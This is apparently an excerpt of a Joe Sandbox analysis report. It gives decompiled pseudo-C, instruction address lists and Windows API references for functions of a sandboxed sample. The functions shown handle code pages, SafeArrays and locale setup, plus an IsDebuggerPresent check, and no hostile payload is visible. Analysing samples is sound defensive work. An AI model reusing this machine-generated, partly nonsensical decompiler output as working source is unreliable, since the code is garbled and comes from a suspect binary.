															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 030061B7, Relevance: 6.2, APIs: 4, Instructions: 159
    C-Code - Quality: 91%
    			E030061B7(void* __ecx, void* __edx, void* __eflags, int _a4, int _a8) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				int _t56;
				signed char _t59;
				int _t61;
				short* _t62;
				signed int _t66;
				signed char* _t78;
				signed int _t81;
				int _t82;
				signed int _t85;
				intOrPtr* _t86;
				int _t91;
				signed char _t92;
				signed int _t93;
				int _t95;
				int _t97;
				signed int _t98;
				signed int _t101;
				intOrPtr* _t104;
				signed int _t105;

				_t53 =  *0x300bbe4; // 0xbb40e64e
				_v8 = _t53 ^ _t105;
				_t82 = _a8;
				_t97 = E0300613B(_a4);
				_t100 = 0;
				_a4 = _t97;
				if(_t97 != 0) {
					_v32 = 0;
					_t56 = 0;
					__eflags = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t56 + 0x300b880)) - _t97;
						if( *((intOrPtr*)(_t56 + 0x300b880)) == _t97) {
							break;
						}
						_v32 = _v32 + 1;
						_t56 = _t56 + 0x30;
						__eflags = _t56 - 0xf0;
						if(_t56 < 0xf0) {
							continue;
						} else {
							__eflags = _t97 - 0xfde8;
							if(_t97 == 0xfde8) {
								L35:
								_t64 = _t56 | 0xffffffff;
								__eflags = _t56 | 0xffffffff;
							} else {
								__eflags = _t97 - 0xfde9;
								if(_t97 == 0xfde9) {
									goto L35;
								} else {
									_t56 = IsValidCodePage(_t97 & 0x0000ffff);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L35;
									} else {
										_t56 = GetCPInfo(_t97,  &_v28);
										__eflags = _t56;
										if(_t56 == 0) {
											__eflags =  *0x300c654 - _t100; // 0x0
											if(__eflags != 0) {
												goto L1;
											} else {
												goto L35;
											}
										} else {
											E03006C50(_t82 + 0x1c, _t100, 0x101);
											_t95 = 1;
											 *(_t82 + 4) = _t97;
											 *(_t82 + 0xc) = _t100;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t82 + 8) = _t100;
											} else {
												__eflags = _v22;
												if(_v22 != 0) {
													_t104 =  &_v21;
													while(1) {
														_t92 =  *_t104;
														__eflags = _t92;
														if(_t92 == 0) {
															goto L29;
														}
														_t81 =  *(_t104 - 1) & 0x000000ff;
														_t93 = _t92 & 0x000000ff;
														while(1) {
															__eflags = _t81 - _t93;
															if(_t81 > _t93) {
																break;
															}
															 *(_t82 + _t81 + 0x1d) =  *(_t82 + _t81 + 0x1d) | 0x00000004;
															_t81 = _t81 + 1;
															__eflags = _t81;
														}
														_t104 = _t104 + 2;
														__eflags =  *(_t104 - 1);
														if( *(_t104 - 1) != 0) {
															continue;
														}
														goto L29;
													}
												}
												L29:
												_t78 = _t82 + 0x1e;
												_t91 = 0xfe;
												do {
													 *_t78 =  *_t78 | 0x00000008;
													_t78 =  &(_t78[1]);
													_t91 = _t91 - 1;
													__eflags = _t91;
												} while (_t91 != 0);
												 *(_t82 + 0xc) = E03005E74( *(_t82 + 4));
												 *(_t82 + 8) = _t95;
											}
											_t97 = _t82 + 0x10;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L25:
											_t100 = _t82;
											E03005F07(_t82);
											goto L2;
										}
									}
								}
							}
						}
						goto L36;
					}
					E03006C50(_t82 + 0x1c, _t100, 0x101);
					_t85 = _v32 * 0x30;
					_v36 = _t100;
					_t101 = _t85 + 0x300b890;
					_v32 = _t101;
					while(1) {
						L21:
						__eflags =  *_t101;
						if( *_t101 == 0) {
							break;
						}
						_t59 =  *(_t101 + 1);
						__eflags = _t59;
						if(_t59 != 0) {
							_t98 =  *_t101 & 0x000000ff;
							_t66 = _t59 & 0x000000ff;
							while(1) {
								__eflags = _t98 - _t66;
								if(_t98 > _t66) {
									break;
								}
								 *(_t82 + _t98 + 0x1d) =  *(_t82 + _t98 + 0x1d) |  *(_v36 + 0x300b87c);
								_t66 =  *(_t101 + 1) & 0x000000ff;
								_t98 = _t98 + 1;
								__eflags = _t98;
							}
							_t97 = _a4;
							_t101 = _t101 + 2;
							__eflags = _t101;
							continue;
						}
						break;
					}
					_v36 = _v36 + 1;
					_t101 = _v32 + 8;
					__eflags = _v36 - 4;
					_v32 = _t101;
					if(_v36 < 4) {
						goto L21;
					}
					 *(_t82 + 4) = _t97;
					 *(_t82 + 8) = 1;
					_t61 = E03005E74(_t97);
					 *(_t82 + 0xc) = _t61;
					_t62 = _t82 + 0x10;
					_t86 = _t85 + 0x300b884;
					_t95 = 6;
					do {
						 *_t62 =  *_t86;
						_t86 = _t86 + 2;
						_t62 = _t62 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L25;
				} else {
					L1:
					E03005EA3(_t82);
					L2:
					_t64 = 0;
				}
				L36:
				return E03006BA0(_t64, _t82, _v8 ^ _t105, _t95, _t97, _t100);
			}
































    0x030061bf
    0x030061c6
    0x030061ca
    0x030061d7
    0x030061d9
    0x030061db
    0x030061e0
    0x030061f0
    0x030061f3
    0x030061f3
    0x030061f5
    0x030061f5
    0x030061fb
    0x00000000
    0x00000000
    0x03006201
    0x03006204
    0x03006207
    0x0300620c
    0x00000000
    0x0300620e
    0x0300620e
    0x03006214
    0x0300638e
    0x0300638e
    0x0300638e
    0x0300621a
    0x0300621a
    0x03006220
    0x00000000
    0x03006226
    0x0300622a
    0x03006230
    0x03006232
    0x00000000
    0x03006238
    0x0300623d
    0x03006243
    0x03006245
    0x03006382
    0x03006388
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0300624b
    0x03006255
    0x0300625c
    0x03006260
    0x03006263
    0x03006266
    0x03006269
    0x0300636b
    0x0300626f
    0x0300626f
    0x03006273
    0x03006279
    0x0300627c
    0x0300627c
    0x0300627e
    0x03006280
    0x00000000
    0x00000000
    0x03006286
    0x0300628a
    0x0300633b
    0x0300633b
    0x0300633d
    0x00000000
    0x00000000
    0x03006335
    0x0300633a
    0x0300633a
    0x0300633a
    0x0300633f
    0x03006342
    0x03006346
    0x00000000
    0x00000000
    0x00000000
    0x03006346
    0x0300627c
    0x0300634c
    0x0300634c
    0x0300634f
    0x03006354
    0x03006354
    0x03006357
    0x03006358
    0x03006358
    0x03006358
    0x03006363
    0x03006366
    0x03006366
    0x0300637a
    0x0300637d
    0x0300637e
    0x0300637f
    0x03006329
    0x03006329
    0x0300632b
    0x00000000
    0x0300632b
    0x03006245
    0x03006232
    0x03006220
    0x03006214
    0x00000000
    0x0300620c
    0x0300629c
    0x030062a7
    0x030062aa
    0x030062ad
    0x030062b3
    0x030062e3
    0x030062e3
    0x030062e3
    0x030062e6
    0x00000000
    0x00000000
    0x030062b8
    0x030062bb
    0x030062bd
    0x030062bf
    0x030062c2
    0x030062d9
    0x030062d9
    0x030062db
    0x00000000
    0x00000000
    0x030062d0
    0x030062d4
    0x030062d8
    0x030062d8
    0x030062d8
    0x030062dd
    0x030062e0
    0x030062e0
    0x00000000
    0x030062e0
    0x00000000
    0x030062bd
    0x030062eb
    0x030062ee
    0x030062f1
    0x030062f5
    0x030062f8
    0x00000000
    0x00000000
    0x030062fc
    0x030062ff
    0x03006306
    0x0300630d
    0x03006310
    0x03006313
    0x03006319
    0x0300631a
    0x0300631d
    0x03006320
    0x03006323
    0x03006326
    0x03006326
    0x03006326
    0x00000000
    0x030061e2
    0x030061e2
    0x030061e4
    0x030061e9
    0x030061e9
    0x030061e9
    0x03006391
    0x0300639f

    APIs
      • Part of subcall function 0300613B: GetOEMCP.KERNEL32(00000000), ref: 03006164
      • Part of subcall function 0300613B: GetACP.KERNEL32(00000000), ref: 03006187
    • IsValidCodePage.KERNEL32(-00000030), ref: 0300622A
    • GetCPInfo.KERNEL32(00000000,?), ref: 0300623D
    • setSBUpLow.LIBCMT ref: 0300632B
      • Part of subcall function 03005F07: GetCPInfo.KERNEL32(?,?), ref: 03005F28
      • Part of subcall function 03005F07: ___crtGetStringTypeA.LIBCMT ref: 03005FA5
      • Part of subcall function 03005F07: ___crtLCMapStringA.LIBCMT ref: 03005FC5
      • Part of subcall function 03005F07: ___crtLCMapStringA.LIBCMT ref: 03005FEA
    • setSBCS.LIBCMT ref: 030061E4
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
